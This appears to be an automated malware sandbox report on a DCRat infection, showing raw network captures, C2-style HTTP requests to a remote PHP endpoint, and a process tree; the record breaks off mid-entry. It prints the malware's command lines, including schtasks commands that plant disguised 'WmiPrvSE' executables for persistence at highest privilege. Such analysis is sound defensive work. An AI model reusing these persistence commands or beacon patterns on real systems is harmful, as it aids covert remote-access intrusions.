                                                Apr 25, 2024 10:20:46.603035927 CEST1289INData Raw: 32 2e 31 36 34 20 39 36 2e 31 37 38 34 20 31 34 31 2e 32 30 38 20 39 37 2e 31 33 33 31 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 33 39 2e 31 30 34 20 39 32 2e 33 36 30 35 4c 31
                                                Data Ascii: 2.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fi
                                                Apr 25, 2024 10:20:46.603072882 CEST1289INData Raw: 30 32 20 39 39 2e 39 39 39 31 20 32 39 34 2e 30 32 39 20 39 39 2e 39 39 39 31 20 32 39 33 2e 34 35 35 20 31 30 30 2e 33 38 31 43 32 39 30 2e 33 39 35 20 31 30 33 2e 34 33 36 20 32 38 37 2e 31 34 33 20 31 30 36 2e 34 39 31 20 32 38 34 2e 30 38 33
                                                Data Ascii: 02 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.892 109.738 260.749 128.26 251.568 139.717C247.36 137.043 243.152 134.561 238.944 131.888C239.136 130.36 239.136 128.833 238.37 127.496C236.267 123.
                                                Apr 25, 2024 10:20:46.603162050 CEST1289INData Raw: 36 39 2e 31 30 30 39 20 36 37 2e 33 34 36 36 20 37 35 2e 30 33 30 31 20 37 33 2e 32 36 36 31 43 38 30 2e 31 39 34 33 20 37 38 2e 34 32 31 37 20 38 35 2e 35 34 39 37 20 38 33 2e 31 39 35 35 20 39 31 2e 36 37 30 32 20 38 37 2e 32 30 35 35 43 39 34
                                                Data Ascii: 69.1009 67.3466 75.0301 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059 112.984 109.649 122.34C109.649 122.34 109.649 122.34 109.458 122.34C100.468 125.586 92.0527
                                                Apr 25, 2024 10:20:46.603199005 CEST1289INData Raw: 35 37 33 38 20 31 32 38 2e 30 36 39 20 31 30 2e 39 35 36 33 20 31 32 38 2e 38 33 33 43 31 31 2e 33 33 38 38 20 31 32 39 2e 34 30 35 20 31 32 2e 31 30 33 39 20 31 32 39 2e 37 38 37 20 31 32 2e 36 37 37 37 20 31 33 30 2e 31 36 39 43 31 33 2e 30 36
                                                Data Ascii: 5738 128.069 10.9563 128.833C11.3388 129.405 12.1039 129.787 12.6777 130.169C13.0602 130.551 13.634 130.742 14.0165 130.933C12.1039 131.506 10.3825 132.843 9.61744 134.752C9.42617 135.134 9.8087 135.516 9.99997 135.898C13.4427 138.38 17.4593 1
                                                Apr 25, 2024 10:20:46.844353914 CEST1289INData Raw: 32 36 2e 38 34 38 20 36 37 2e 35 37 30 38 20 33 32 38 2e 31 38 35 43 37 32 2e 39 32 36 32 20 33 32 39 2e 39 30 33 20 37 39 2e 30 34 36 37 20 33 32 39 2e 31 33 39 20 38 34 2e 34 30 32 31 20 33 32 37 2e 38 30 33 43 38 39 2e 35 36 36 32 20 33 32 36
                                                Data Ascii: 26.848 67.5708 328.185C72.9262 329.903 79.0467 329.139 84.4021 327.803C89.5662 326.466 94.5391 324.748 99.1295 322.265C108.501 317.682 116.726 311.19 123.42 303.17C123.42 308.708 123.42 314.054 123.803 319.592C123.42 319.401 123.229 319.401 12
                                                Apr 25, 2024 10:20:47.087306976 CEST | 492 | OUT | GET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:20:47.328764915 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:20:47 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                6 | 192.168.2.4 | 49748 | 141.8.194.74 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Apr 25, 2024 10:21:02.191961050 CEST | 619 | OUT | GET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/css
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:21:02.434752941 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:21:02 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Apr 25, 2024 10:21:02.922815084 CEST | 595 | OUT | GET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/css
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:21:03.166531086 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:21:03 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding



                                                Target ID:0
                                                Start time:10:16:55
                                                Start date:25/04/2024
                                                Path:C:\Users\user\Desktop\4c6fK85tK7.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\4c6fK85tK7.exe"
                                                Imagebase:0x400000
                                                File size:4'329'984 bytes
                                                MD5 hash:68DFE1E08B8CC7D19FF72334FDD09DB8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:10:16:56
                                                Start date:25/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\ yberLoad.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\ yberLoad.exe"
                                                Imagebase:0x400000
                                                File size:4'253'696 bytes
                                                MD5 hash:A84070968353EDCC9559F54DEEDD8FE9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 96%, ReversingLabs
                                                • Detection: 86%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:10:16:56
                                                Start date:25/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\MVPLoader.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\MVPLoader.exe"
                                                Imagebase:0x7ff7605b0000
                                                File size:348'160 bytes
                                                MD5 hash:F1F43CF5A79E51BA13EF602B25C63A9E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 0%, ReversingLabs
                                                • Detection: 1%, Virustotal
                                                Reputation:low
                                                Has exited:false

                                                Target ID:3
                                                Start time:10:16:57
                                                Start date:25/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\CyberLoader.exe"
                                                Imagebase:0x7ff7699e0000
                                                File size:3'895'538 bytes
                                                MD5 hash:1B4CF2A40E1387CF97DFBE1303C9619A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 70%, ReversingLabs
                                                • Detection: 61%, Virustotal
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:10:16:57
                                                Start date:25/04/2024
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe"
                                                Imagebase:0x190000
                                                File size:147'456 bytes
                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:5
                                                Start time:10:16:57
                                                Start date:25/04/2024
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs"
                                                Imagebase:0x190000
                                                File size:147'456 bytes
                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:6
                                                Start time:10:17:03
                                                Start date:25/04/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" "
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:10:17:03
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:10:17:03
                                                Start date:25/04/2024
                                                Path:C:\msPortRefnetdhcp\componentWininto.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\msPortRefnetdhcp\componentWininto.exe"
                                                Imagebase:0xe30000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1737716392.00000000037C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.1747518014.000000001341D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 88%, ReversingLabs
                                                • Detection: 65%, Virustotal
                                                Reputation:low
                                                Has exited:true

                                                Target ID:12
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 13 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 14 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:18
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 11 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:19
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:20
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
                                                Imagebase:0x7ff76f990000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:21
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat"
                                                Imagebase:0x7ff60b1b0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:23
                                                Start time:10:17:06
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\w32tm.exe
                                                Wow64 process (32bit):false
                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                Imagebase:0x7ff7d5f30000
                                                File size:108'032 bytes
                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:26
                                                Start time:10:17:07
                                                Start date:25/04/2024
                                                Path:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Imagebase:0xec0000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1848295221.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 88%, ReversingLabs
                                                • Detection: 65%, Virustotal
                                                Has exited:true

                                                Target ID:27
                                                Start time:10:17:07
                                                Start date:25/04/2024
                                                Path:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Imagebase:0x80000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001B.00000002.1849224298.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001B.00000002.1849224298.000000000266B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                Target ID:28
                                                Start time:10:17:12
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:29
                                                Start time:10:17:13
                                                Start date:25/04/2024
                                                Path:C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
                                                Imagebase:0x7e0000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.1888221161.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                Target ID:31
                                                Start time:10:17:14
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\da4d56e5-dd25-4b11-bec9-392111f2ec60.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:33
                                                Start time:10:17:23
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:35
                                                Start time:10:18:48
                                                Start date:25/04/2024
                                                Path:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                Imagebase:0x8b0000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 88%, ReversingLabs
                                                • Detection: 65%, Virustotal
                                                Has exited:true

                                                Target ID:36
                                                Start time:10:18:50
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:37
                                                Start time:10:18:50
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:38
                                                Start time:10:19:26
                                                Start date:25/04/2024
                                                Path:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                Imagebase:0x930000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                Target ID:39
                                                Start time:10:19:29
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:40
                                                Start time:10:19:29
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:41
                                                Start time:10:19:49
                                                Start date:25/04/2024
                                                Path:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                Imagebase:0x280000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.3409082832.0000000002860000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                Target ID:42
                                                Start time:10:19:51
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:43
                                                Start time:10:19:51
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:44
                                                Start time:10:20:12
                                                Start date:25/04/2024
                                                Path:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                Imagebase:0x360000
